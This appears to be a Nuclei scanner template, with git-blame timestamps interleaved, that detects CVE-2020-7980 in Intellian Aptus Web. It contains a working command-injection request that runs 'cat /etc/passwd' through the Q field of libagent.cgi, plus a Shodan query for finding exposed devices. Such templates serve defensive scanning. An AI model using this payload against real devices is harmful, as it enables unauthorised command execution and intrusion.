2022-04-19 21:10:53 +00:00
id : CVE-2020-7980
info :
2022-04-29 19:58:07 +00:00
name : Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
2022-04-19 21:10:53 +00:00
author : ritikchaddha
severity : critical
2022-05-17 09:18:12 +00:00
description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE : a valid sid cookie for a login to the intellian default account might be needed.'
2022-04-19 21:10:53 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2020-7980
2022-05-17 09:18:12 +00:00
- https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
- https://github.com/Xh4H/Satellian-CVE-2020-7980
- http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
2022-04-19 21:56:21 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-04-19 21:56:21 +00:00
cve-id : CVE-2020-7980
cwe-id : CWE-78
2022-04-22 10:38:41 +00:00
metadata :
shodan-query : http.title:"Intellian Aptus Web"
2022-08-27 04:41:18 +00:00
tags : cve,cve2020,intellian,aptus,packetstorm,satellian,rce
2022-04-19 21:10:53 +00:00
requests :
2022-04-19 21:16:41 +00:00
- raw :
- |
POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
Cookie : ctr_t=0; sid=123456789
2022-04-19 21:50:19 +00:00
{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1 }
2022-04-19 21:10:53 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-04-19 21:10:53 +00:00
max-redirects : 2
matchers-condition : and
matchers :
2022-04-19 21:50:19 +00:00
- type : regex
regex :
- "root:[x*]:0:0"
2022-04-19 21:10:53 +00:00
- type : status
status :
- 200
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/29